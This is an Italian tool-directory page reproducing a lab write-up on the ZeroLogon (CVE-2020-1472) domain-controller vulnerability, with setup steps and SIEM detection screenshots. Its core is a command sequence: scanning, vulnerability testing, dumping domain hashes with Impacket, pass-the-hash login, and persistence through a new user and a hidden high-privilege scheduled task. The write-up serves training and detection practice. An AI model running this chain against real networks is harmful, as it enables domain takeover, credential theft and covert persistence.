Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
ZeroLogon-CVE-2020-1472-lab — Spiegazione e dimostrazione della vulnerabilità ZeroLogon (CVE-2020-1472) | Kitploit
Strumenti/GitHubGitHub/100hnomeunome/zerologon-cve-2020-1472-lab
Escalation di PrivilegiAttacchi alle PasswordMeccanismi di PersistenzaAnalisi delle VulnerabilitàExploitPost-ExploitCTFPenetration TestingApprendimento e Formazione

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Lab e Pratica
GitHub100hnomeunome/zerologon-cve-2020-1472-lab

ZeroLogon-CVE-2020-1472-lab

Spiegazione e dimostrazione della vulnerabilità ZeroLogon (CVE-2020-1472)

Vedi Repository
10 mesi faNon ancora revisionato

ZeroLogon-CVE-2020-1472

Spiegazione e dimostrazione della vulnerabilità ZeroLogon (CVE-2020-1472)

L'obiettivo di questo laboratorio è strettamente educativo. La sua esecuzione non è consigliata in ambienti di produzione o che non ti appartengono.

Sulla Vulnerabilità

Contesto della vulnerabilità

Questa vulnerabilità consente a un criminale informatico di prendere il controllo di un Controller di Dominio (DC). Ciò viene fatto modificando o rimuovendo la password di un account di servizio sul controller. L'agente malintenzionato può semplicemente causare un denial of service o prendere il controllo e possedere l'intera rete. Ad agosto 2020, Microsoft ha rilasciato una patch.

  • Gravità: 10.0 (Critica) (CVSS v3.1)

Componente interessato: Microsoft Netlogon Remote Protocol (MS-NRPC)

Versioni di Windows interessate:

  • Windows Server 2008 R2
  • 2012 / 2012 R2
  • 2016
  • 2019
  • Versioni precedenti alla patch di agosto/settembre 2020

Requisiti

Clonare i repository

  • Impacket
  • zerologon-CVE-2020-1472
  • CVE-2020-1472 - Test se il server target è vulnerabile

Se vuoi eseguirlo localmente!

  • Download di Kali Linux
  • Download di Windows Server 2008 R2 vulnerabile
  • Virtualbox

Su AWS è anche possibile con queste immagini (attenzione alla fatturazione)

  • Windows vulnerabile - AMI della community 921877552404/win2016-dvwa-printnightmare-final-2022-07-04
  • Kali Linux - AMI del Marketplace

Extra: Un account su Wazuh per l'analisi degli eventi SIEM.

  • Wazuh Cloud con trial di 14 giorni

Come sfruttarla

Consiglio: Su Kali Linux, il servizio SSH è disattivato per impostazione predefinita — è necessario avviarlo manualmente.

Prima di testare se il server è vulnerabile, possiamo usare nmap per vedere quali porte sono aperte:

root@kitploit:~
nmap -sS -T4 -F --open -n ip
Screenshot 2025-10-10 alle 09:34:13

Usando CVE-2020-1472 - Test se il server target è vulnerabile. Esegui il comando:

root@kitploit:~
zerologon_tester.py <dc-name> <dc-ip>
Screenshot 2025-10-04 alle 20:14:40

Lo strumento secretsdump è un toolkit di Impacket

root@kitploit:~
python3 secretsdump.py -just-dc wayne/w2008\[email protected]
Screenshot 2025-10-04 alle 20:23:53
root@kitploit:~
python3 wmiexec.py wayne/[email protected] -hashes aad3b435b51404eeaad3b435b51404ee:088386eb6982d0c2f8960c26b1ff9e6c
Screenshot 2025-10-04 alle 20:27:05

Se tutto va bene, riusciremo a fare il login con l'hash Cos'è un attacco pass-the-hash?

Screenshot 2025-10-04 alle 20:30:39

Ora creiamo una persistenza! Può essere un nuovo utente!

root@kitploit:~
net user coringa Batman2025 /add
Screenshot 2025-10-04 alle 20:36:09

Fatto! L'utente è stato creato con successo!

Screenshot 2025-10-04 alle 20:38:04

È anche possibile creare un'attività!

root@kitploit:~
mkdir C:\Temp
root@kitploit:~
schtasks /Create /TN "CriarBackupPS1" /TR "powershell -NoProfile -WindowStyle Hidden -Command \"New-Item -Path 'C:\Temp\backup.ps1' -ItemType File -Force -Value '# backup script'\"" /SC ONLOGON /RL HIGHEST /F
Screenshot 2025-10-10 alle 10:17:17 Screenshot 2025-10-10 alle 10:20:33

Eventi nel SIEM

È possibile vedere la creazione degli utenti e gli eventi relativi al pass-the-hash e alla creazione di utenti!

2025-10-06_10-08-10 2025-10-06_10-09-06

Riferimenti

  • Zerologon (CVE-2020-1472): An Unauthenticated Privilege Escalation to Full Domain Privilege
  • Cos'è Zerologon?
  • [MS-NRPC]: Netlogon Remote Protocol
  • CVE-2020-1472 Detail
  • ZeroLogon-CVE-2020-1472 - Lab su Youtube
  • Attacco Pass-the-Hash
  • Maggiori informazioni su Impacket
Scarica lo strumento